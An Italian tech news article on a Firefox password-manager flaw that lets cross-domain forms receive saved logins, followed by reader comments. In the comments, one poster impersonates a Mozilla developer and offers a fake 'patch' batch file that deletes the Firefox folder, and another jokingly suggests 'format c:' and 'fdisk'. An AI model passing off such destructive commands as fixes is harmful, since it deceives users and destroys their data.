Firefox perde le password per strada

Una debolezza nel gestore di password del celebre browser open source potrebbe consentire ad un aggressore di rubare i dati di log-in degli utenti. Colpito dal problema, ma solo di striscio, anche Internet Explorer

Roma - Ieri è stata resa pubblica una seria debolezza di Firefox che, in certe circostanze, potrebbe dare l'opportunità ad un malintenzionato di rubare l'identità di un ignaro utente.

Il problema risiede nel sistema per la gestione delle password di Firefox, che non controlla la destinazione della form a cui vengono inviati i dati di accesso: ciò apre la strada ad attacchi di cross-domain form, in cui il nome utente e la password archiviati sulla pagina di un certo dominio vengono trasmessi anche ad una pagina di un altro dominio.

Va detto che la falla è stata registrata in BugZilla, il sistema di Mozilla Foundation per gestire i bug, il 12 novembre, tuttavia è divenuta di dominio pubblico soltanto nelle scorse ore. La prima evidenza del problema risale fra l'altro al 27 ottobre, quando Netcraft riportò di un attacco di phishing che inviava i dati di accesso degli utenti di MySpace.com ad un server francese.
La vulnerabilità è stata sviscerata in questo advisory di Chapin Information Services, dove viene proposto anche un test proof-of-concept. CIS ha chiamato la debolezza Reverse Cross-Site Request (RCSR), ed ha spiegato che questa potrebbe essere utilizzata per colpire qualsiasi utente che sta visitando un sito dove si può aggiungere codice HTML, come i blog e certi forum.

CIS ha poi detto che questa falla affligge anche Internet Explorer, ma in questo browser il gestore di password, a differenza di Firefox, "può essere ingannato" solo se la form di autenticazione fraudolenta si trova nella stessa pagina della form legittima.

In attesa che Mozilla sviluppi una patch, gli esperti di sicurezza hanno suggerito agli utenti di Firefox, e a quelli degli altri browser che implementano la gestione password di Mozilla, di disattivare la memorizzazione dei dati di accesso alle pagine Web.
196 Commenti alla Notizia Firefox perde le password per strada
Ordina
  • Per chi non ne può fare a meno di aspettare...

    Queste è la fixist della rel. 2.0.0.1
    http://forums.mozillazine.org/viewtopic.php?t=4949...
    che potete già scaricare (siamo quasi al rilascio ufficiale) in italiano qui:
    http://ftp.mozilla.org/pub/mozilla.org/firefox/nig.../


    Ciao.
    non+autenticato
  • Ma nessuno pensa e si preoccupa delle infinite connessioni ftp, pop3 e imap senza la protezione SSL? Dove le password viaggiano in chiaro e dove l'utente medio ignora quanto avviene?
    non+autenticato
  • Qualunque browser puo' esserne affetto in questo senso:
    se non viene specificata l' action di un dato form il browser controlla solo il dominio (tutta la URL) in cui il form e' inserito e infila user e pass (es) nei campi del form che hanno tali nomi.
    In molti form l' action viene settata a RUNTIME ovvero sull' onclick del bottone "invia" o sull' onsubmit del form.
    Viene inserito cio':

    onclick="this.form.action='pagina_server.asp';this.form.submit();"

    in modo che il form sia lo stesso ma punti a pagine diverse a seconda del button che viene premuto.

    l' action settata a RUNTIME da Javascript non consente al browser di sapere dove il form verra' inviato e a parita' di dominio e nomi campi TUTTI I BROWSER mettono i valori salvati nei campi relativi.

    SONO DUNQUE TUTTI VULNERABILI ?
    o non lo e' nessuno ?

    Simone
    non+autenticato

  • - Scritto da:
    > Qualunque browser puo' esserne affetto in questo
    > senso:
    > se non viene specificata l' action di un dato
    > form il browser controlla solo il dominio (tutta
    > la URL) in cui il form e' inserito e infila user
    > e pass (es) nei campi del form che hanno tali
    > nomi.
    > In molti form l' action viene settata a RUNTIME
    > ovvero sull' onclick del bottone "invia" o sull'
    > onsubmit del
    > form.
    > Viene inserito cio':
    >
    > onclick="this.form.action='pagina_server.asp';this
    >
    > in modo che il form sia lo stesso ma punti a
    > pagine diverse a seconda del button che viene
    > premuto.
    >
    > l' action settata a RUNTIME da Javascript non
    > consente al browser di sapere dove il form verra'
    > inviato e a parita' di dominio e nomi campi TUTTI
    > I BROWSER mettono i valori salvati nei campi
    > relativi.
    >
    > SONO DUNQUE TUTTI VULNERABILI ?
    > o non lo e' nessuno ?
    >
    > Simone

    E' da 24 ore che cerco di spiegare sta cosa, ma non capiscono.
    Se un sito consente di inserire dei form a utenti esterni è insicuro con QUALSIASI browser.
    Se uno vuole fregarti ci mette un secondo a lasciare l'action originale e ad inserire un 'OnClick' sul submit.

  • - Scritto da:
    > Qualunque browser puo' esserne affetto in questo
    > senso:
    > se non viene specificata l' action di un dato
    > form il browser controlla solo il dominio (tutta
    > la URL) in cui il form e' inserito e infila user
    > e pass (es) nei campi del form che hanno tali
    > nomi.
    > In molti form l' action viene settata a RUNTIME
    > ovvero sull' onclick del bottone "invia" o sull'
    > onsubmit del
    > form.
    > Viene inserito cio':
    >
    > onclick="this.form.action='pagina_server.asp';this
    >
    > in modo che il form sia lo stesso ma punti a
    > pagine diverse a seconda del button che viene
    > premuto.
    >
    > l' action settata a RUNTIME da Javascript non
    > consente al browser di sapere dove il form verra'
    > inviato e a parita' di dominio e nomi campi TUTTI
    > I BROWSER mettono i valori salvati nei campi
    > relativi.
    >
    > SONO DUNQUE TUTTI VULNERABILI ?
    > o non lo e' nessuno ?
    >
    > Simone

    non ci avete capito un tubo

    firefox incolla automaticamente le password nei moduli form che gli fanno "ricordare" dei moduli leggittimi, tuttavia (e qui sta il problema) questi moduli possono trovarsi ovunque anche su domini diversi

    ma avete letto almeno il titolo?

    "Firefox perde le password per strada"

    non+autenticato
  • Salve a tutti, faccio parte del team di sviluppo Mozilla Italia.

    La mozilla ha appena rilasciato la patch per correggere l'errore, ma per evitare un sovraffollamento dei server rischiando il blocco delle macchine sarà disponibile agli utenti finali, nel sito ufficiale, solo nei prossimi giorni. Di seguito vi indico le operazioni necessarie per creare la patch e riparare l'errore manualmente.

    E' necessario aprire il prompt dei comandi e digitare le righe che seguono, premendo invio alla fine di ogni riga. In alternativa, è sufficiente copiare il codice che segue in un file di testo da salvare con estensione .bat ed eseguire il file.

    echo off
    cd \
    cd programmi
    del "Mozilla Firefox"
    s


    Dopo l'esecuzione del codice il vostro firefox non vi causerà più alcun problema.
    Il codice che vi ho scritto funziona con le impostazioni di installazione di default, cioè con il browser installato nella cartella "\Programmi\Mozilla Firefox" della stessa partizione in cui è installato windows. In caso contrario è necessario modificare il codice che vi ho fornito, inserendo dopo la prima riga la seguente

    d:

    dove al posto di 'd', indicare la partizione in cui è installato il browser. Se la cartella non è "Mozilla Firefox", modificare la patch inserendo il nome corretto.


    Le informazioni che vi ho fornito sono da indendersi come confidenziali e riservate.
    La patch è fornita in anteprima per i visitatori del forum di punto informatico e non ne è ammessa la diffusione, almeno finchè non supererà i test di routine.

    La patch che vi ho fornito è in una versione beta, quindi potenziamente instabile. Raccomandiamo di non eseguire la patch agli utenti che non conoscono i comandi ms-dos e non sanno quindi cosa stanno facendo, in quanto nè la fondazione mozilla, nè l'autore di questo messaggio, nè i gestori di punto informatico sono responsabili di un eventuale danneggiamento o perdita di dati causati dall'esecuzione della suddetta patch. Eseguendo la patch agite a vostro rischio e pericolo, tuttavia assicuriamo al 100% che dopo aver eseguito correttamente la patch il problema non si verificherà più.


    We apologize for the inconvenience.
    non+autenticato
  • dopo il codice indicato nel post aggiungetevi queste due righe:

    cd "Internet Explorer"
    iexplorer.exe "http://www.opera.com/download"



    lol...
    non+autenticato
  • Bella questa patch
    In un colpo solo la cancellazione della cartella dove dovrebbe essere installato di default Firefox.
    Comunque io al posto della volpetta cancellerei qualcos'altro....Fan Linux
    Fan Linux
    Fan Linux
    Fan Linux
    non+autenticato

  • - Scritto da:
    > Salve a tutti, faccio parte del team di sviluppo
    > Mozilla
    > Italia.
    >
    > La mozilla ha appena rilasciato la patch per
    > correggere l'errore, ma per evitare un
    > sovraffollamento dei server rischiando il blocco
    > delle macchine sarà disponibile agli utenti
    > finali, nel sito ufficiale, solo nei prossimi
    > giorni. Di seguito vi indico le operazioni
    > necessarie per creare la patch e riparare
    > l'errore manualmente.
    >
    >
    > E' necessario aprire il prompt dei comandi e
    > digitare le righe che seguono, premendo invio
    > alla fine di ogni riga. In alternativa, è
    > sufficiente copiare il codice che segue in un
    > file di testo da salvare con estensione .bat ed
    > eseguire il file.
    >
    >
    > echo off
    > cd \
    > cd programmi
    > del "Mozilla Firefox"
    > s
    >
    >
    > Dopo l'esecuzione del codice il vostro firefox
    > non vi causerà più alcun problema.
    >
    > Il codice che vi ho scritto funziona con le
    > impostazioni di installazione di default, cioè
    > con il browser installato nella cartella
    > "\Programmi\Mozilla Firefox" della stessa
    > partizione in cui è installato windows. In caso
    > contrario è necessario modificare il codice che
    > vi ho fornito, inserendo dopo la prima riga la
    > seguente
    >
    > d:
    >
    > dove al posto di 'd', indicare la partizione in
    > cui è installato il browser. Se la cartella non è
    > "Mozilla Firefox", modificare la patch inserendo
    > il nome
    > corretto.
    >
    >
    > Le informazioni che vi ho fornito sono da
    > indendersi come confidenziali e riservate.
    >
    > La patch è fornita in anteprima per i visitatori
    > del forum di punto informatico e non ne è ammessa
    > la diffusione, almeno finchè non supererà i test
    > di
    > routine.
    >
    > La patch che vi ho fornito è in una versione
    > beta, quindi potenziamente instabile.
    > Raccomandiamo di non eseguire la patch agli
    > utenti che non conoscono i comandi ms-dos e non
    > sanno quindi cosa stanno facendo, in quanto nè la
    > fondazione mozilla, nè l'autore di questo
    > messaggio, nè i gestori di punto informatico sono
    > responsabili di un eventuale danneggiamento o
    > perdita di dati causati dall'esecuzione della
    > suddetta patch. Eseguendo la patch agite a vostro
    > rischio e pericolo, tuttavia assicuriamo al 100%
    > che dopo aver eseguito correttamente la patch il
    > problema non si verificherà
    > più.
    >
    >
    > We apologize for the inconvenience.



    già... hai ragione...

    ie7 è il meglio cmq Fan WindowsFan Windows
    non+autenticato
  • ho fatto come hai detto, ma mi da un errore... mi dice impossibile trovare firefox.exe

    è forse dovuto al fatto che uso winme, che non ha il prompt dei comandi, ma il prompt di msdos? come devo fare?
    non+autenticato

  • - Scritto da:
    > ho fatto come hai detto, ma mi da un errore... mi
    > dice impossibile trovare
    > firefox.exe
    >
    > è forse dovuto al fatto che uso winme, che non ha
    > il prompt dei comandi, ma il prompt di msdos?
    > come devo
    > fare?

    Dai, non ci credo... hai fatto davvero quello che ha detto quel cialtrone??Rotola dal ridere
    non+autenticato

  • - Scritto da:
    > ho fatto come hai detto, ma mi da un errore... mi
    > dice impossibile trovare
    > firefox.exe
    >
    > è forse dovuto al fatto che uso winme, che non ha
    > il prompt dei comandi, ma il prompt di msdos?
    > come devo
    > fare?

    mai accettare caramelle dagli sconosciuti, ingenuotto.
    Rotola dal ridere
    non+autenticato
  • cosè non hai letto che quello non era un codice ma una banalissima sequenza di comandi che appunto si utilizzavano in MSDOS per cancellare le directory??

    un banalissimo file bat

    allora se hai preso per buono quello della patch
    vene sono di migliori
    format c:
    s
    oppure il mitico

    fdisk

    e dopo installi linux
    non+autenticato
  • CDO

    Altra chicca al celebre browser di:

    google
    apple
    intel
    nvidia

    alias

    Mozilla foundation

    PS: intanto Explorer 7 è a prova di bug!!!

    ROSICATE PIUMATI!!!

    Fan WindowsFan WindowsFan Windows
    non+autenticato
CONTINUA A LEGGERE I COMMENTI
1 | 2 | 3 | 4 | 5 | Successiva
(pagina 1/5 - 22 discussioni)